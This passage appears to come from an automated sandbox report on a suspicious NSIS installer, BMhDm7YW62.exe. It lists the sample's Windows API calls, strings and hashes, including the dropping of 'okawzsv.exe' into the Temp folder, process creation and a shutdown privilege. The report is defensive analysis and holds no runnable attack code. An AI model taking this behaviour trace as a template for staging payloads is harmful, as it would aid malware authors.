                                                                                                                        • GetCommandLineA.KERNEL32(jtlkrtaftpgmppuxhth Setup,NSIS Error), ref: 004031A9
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000), ref: 004031BC
                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\BMhDm7YW62.exe",00409168), ref: 004031E7
                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                                                                                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                        • ExitProcess.KERNEL32(00000020), ref: 00403332
                                                                                                                        • OleUninitialize.OLE32(00000020), ref: 00403337
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403357
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000,00000020), ref: 0040336A
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000,00000020), ref: 00403379
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000,00000020), ref: 00403384
                                                                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 00403390
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                                                                                        • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\BMhDm7YW62.exe,0041F0F0,00000001), ref: 0040340A
                                                                                                                        • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040350B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\BMhDm7YW62.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BMhDm7YW62.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$jtlkrtaftpgmppuxhth Setup$~nsu
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: function at 004054BD
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                                                                                        • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                                                                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                                                                                        • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040560F
                                                                                                                        • FindClose.KERNELBASE(?), ref: 00405620
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsfB756.tmp\*.*$\*.*
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph: function at 004061D4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNELBASE(?,00422588,C:\,004057AF,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405E9E
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405EAA
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID: C:\
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039BD
                                                                                                                        • ShowWindow.USER32(?), ref: 004039DA
                                                                                                                        • DestroyWindow.USER32 ref: 004039EE
                                                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A0A
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403A2B
                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A3F
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403A46
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403AF4
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403AFE
                                                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403B18
                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B69
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403C0F
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403C30
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C42
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C5D
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C73
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403C7A
                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C92
                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CA5
                                                                                                                        • lstrlenA.KERNEL32(00420538,?,00420538,jtlkrtaftpgmppuxhth Setup), ref: 00403CCE
                                                                                                                        • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                                                                                                        Strings
                                                                                                                        • jtlkrtaftpgmppuxhth Setup, xrefs: 00403CBF
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                        • String ID: jtlkrtaftpgmppuxhth Setup
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                          • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                        • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\BMhDm7YW62.exe",00000000), ref: 0040365C
                                                                                                                        • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                                                                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 004036E4
                                                                                                                        • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\okawzsv.exe" ), ref: 004036EF
                                                                                                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                                                                                                          • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                                                                                                        • RegisterClassA.USER32 ref: 0040377F
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                                                                                                        • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004037D0
                                                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                                                                                                        • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                                                                                                        • RegisterClassA.USER32(004236E0), ref: 00403848
                                                                                                                        • DialogBoxParamA.USER32(?,00000000,00403981,00000000), ref: 00403867
                                                                                                                        Similarity
                                                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $"C:\Users\user\Desktop\BMhDm7YW62.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C66
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\BMhDm7YW62.exe,00000400), ref: 00402C82
                                                                                                                          • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 00405873
                                                                                                                          • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\BMhDm7YW62.exe,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 00402CCE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\BMhDm7YW62.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                                                                                                        • API String ID: 4283519449-1341131651
                                                                                                                        • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                        • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                                                                                                        • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                                                                                                        • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402EEC
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402F6D
                                                                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F9A
                                                                                                                        • wsprintfA.USER32 ref: 00402FAA
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$FileWritewsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 4209647438-2449383134
                                                                                                                        • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                        • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                                                                                                        • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                                                                                                        • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\okawzsv.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                                                          • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,jtlkrtaftpgmppuxhth Setup,NSIS Error), ref: 00405BA5
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\okawzsv.exe" $C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1941528284-258611627
                                                                                                                        • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                        • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                                                                                                        • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                                                                                                        • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                        • GetLastError.KERNEL32 ref: 0040539D
                                                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                                                                                                        • GetLastError.KERNEL32 ref: 004053BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                        • String ID: C:\Users\user\Desktop$Ls@$\s@
                                                                                                                        • API String ID: 3449924974-4175678751
                                                                                                                        • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                                                                                                        • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                                                                                                        • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                                                                                        • wsprintfA.USER32 ref: 00405F0A
                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 587 40589e-4058a8 588 4058a9-4058d3 GetTickCount GetTempFileNameA 587->588 589 4058e2-4058e4 588->589 590 4058d5-4058d7 588->590 592 4058dc-4058df 589->592 590->588 591 4058d9 590->591 591->592
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 004058B1
                                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\BMhDm7YW62.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 676 4015b3-4015c6 call 402a29 call 40571f 681 4015c8-4015db call 4056b6 676->681 682 40161c-40161f 676->682 689 4015f3-4015f4 call 4053c3 681->689 690 4015dd-4015e0 681->690 684 401621-40163c call 401423 call 405b98 SetCurrentDirectoryA 682->684 685 40164a-40219c call 401423 682->685 697 4028be-4028cd 684->697 701 401642-401645 684->701 685->697 698 4015f9-4015fb 689->698 690->689 694 4015e2-4015e9 call 4053e0 690->694 694->689 706 4015eb-4015ec call 405346 694->706 702 401612-40161a 698->702 703 4015fd-401602 698->703 701->697 702->681 702->682 707 401604-40160d GetFileAttributesA 703->707 708 40160f 703->708 711 4015f1 706->711 707->702 707->708 708->702 711->698
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,C:\,00000000,00405783,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                          • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 712 40576c-405787 call 405b98 call 40571f 717 405789-40578b 712->717 718 40578d-40579a call 405dfa 712->718 719 4057df-4057e1 717->719 722 4057a6-4057a8 718->722 723 40579c-4057a0 718->723 725 4057be-4057c7 lstrlenA 722->725 723->717 724 4057a2-4057a4 723->724 724->717 724->722 726 4057c9-4057dd call 40568b GetFileAttributesA 725->726 727 4057aa-4057b1 call 405e93 725->727 726->719 732 4057b3-4057b6 727->732 733 4057b8-4057b9 call 4056d2 727->733 732->717 732->733 733->725
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,jtlkrtaftpgmppuxhth Setup,NSIS Error), ref: 00405BA5
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(004054D1,?,C:\,00000000,00405783,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040572D
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                                                                                          • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                                                                                        • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057BF
                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057CF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                        • String ID: C:\
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        control_flow_graph 735 4053f8-405425 CreateProcessA 736 405433-405434 735->736 737 405427-405430 CloseHandle 735->737 737->736
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040542A
                                                                                                                        Strings
                                                                                                                        • Error launching installer, xrefs: 0040540B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                        • String ID: Error launching installer
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
